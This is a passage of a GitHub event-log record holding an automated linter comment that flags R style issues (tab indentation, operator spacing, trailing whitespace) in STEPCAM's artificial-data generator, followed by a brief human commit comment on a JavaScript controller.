\n^\n```\n[R/generateArtificialData.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                            (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:32:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:32:25:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                       ~^~\n```\n[R/generateArtificialData.R:32:53:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                   ~^~\n```\n[R/generateArtificialData.R:32:61:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:34:25:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                       ~^~~\n```\n[R/generateArtificialData.R:34:34:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                 ^\n```\n[R/generateArtificialData.R:34:61:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                           ~^~\n```\n[R/generateArtificialData.R:34:68:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                                   ^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities) {\n^\n```\n[R/generateArtificialData.R:35:37:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                    ^\n```\n[R/generateArtificialData.R:35:50:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                                ~^~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == TRUE){\n^\n```\n[R/generateArtificialData.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:37:47:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:37:65:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:38:47:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/generateArtificialData.R:39:12:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities) {\n           ^\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:40:13:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L40) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == TRUE){\n            ^\n```\n[R/generateArtificialData.R:40:31:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L40) *style:* **Put spaces around all infix operators.**\n```r\n​\t  if(mechanism_random == TRUE){\n                             ~^~~\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:29:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for (j in 1:n_traits) {\n^\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for (k in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:44:48:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:46:17:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for (j in 1:n_traits) {\n                ^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:47:19:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for (k in 1:pool_richness) {\n                  ^\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:48:25:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:48:28:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L48) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:48:31:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:48:36:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:44:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n^\n```\n[R/generateArtificialData.R:52:31:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:52:65:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                              traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:53:30:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:53:49:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:55:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n^\n```\n[R/generateArtificialData.R:55:16:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L56) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n^\n```\n[R/generateArtificialData.R:56:43:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                         ~^~~\n```\n[R/generateArtificialData.R:56:71:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                                                      ^\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:59:27:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                         ~^~~\n```\n[R/generateArtificialData.R:59:31:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L59) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                              ^\n```\n[R/generateArtificialData.R:59:51:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                                                  ^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:60:63:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n                                                              ^~\n```\n[R/generateArtificialData.R:61:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L61) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:61:29:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n^\n```\n[R/generateArtificialData.R:64:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L64) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:67:11:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L67) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n          ^\n```\n[R/generateArtificialData.R:67:58:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n                                                        ~^~~\n```\n[R/generateArtificialData.R:68:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:71:14:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:71:62:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:72:11:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n          ^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                        ~^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                         ^\n```\n[R/generateArtificialData.R:73:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n^\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                      cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(\n^\n```\n[R/generateArtificialData.R:77:26:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n                        ~^~~\n```\n[R/generateArtificialData.R:78:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t            as.numeric(as.matrix(comm_spec_matrix[,-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:79:33:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L81) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:81:15:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(\n             ~^~~\n```\n[R/generateArtificialData.R:83:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L83) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:84:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L84) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:85:22:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:86:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L86) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:87:53:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:88:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L88) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:89:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L89) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots)\n^\n```\n[R/generateArtificialData.R:90:13:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L90) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/f5c7ba3a98afbb990859a471c8f77d3ba53b3bde/R/generateArtificialData.R#L91) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n"}},"created_at":"2016-09-21T15:58:23Z"}
{"id":"4597212819","type":"CommitCommentEvent","actor":{"login":"dinosaurfiles"},"repo":{"name":"dinosaurfiles/inhumans-ionic-test"},"payload":{"comment":{"id":19116151,"position":31,"line":49,"path":"www/js/controllers.js","commit_id":"d1603d81deea73382e8565ee7b1cb991f346e7f6","created_at":"2016-09-21T15:58:32Z","updated_at":"2016-09-21T15:58:32Z","body":"@markhamknight  @derick31 Actually doesn't do anything? "}},"created_at":"2016-09-21T15:58:32Z"}
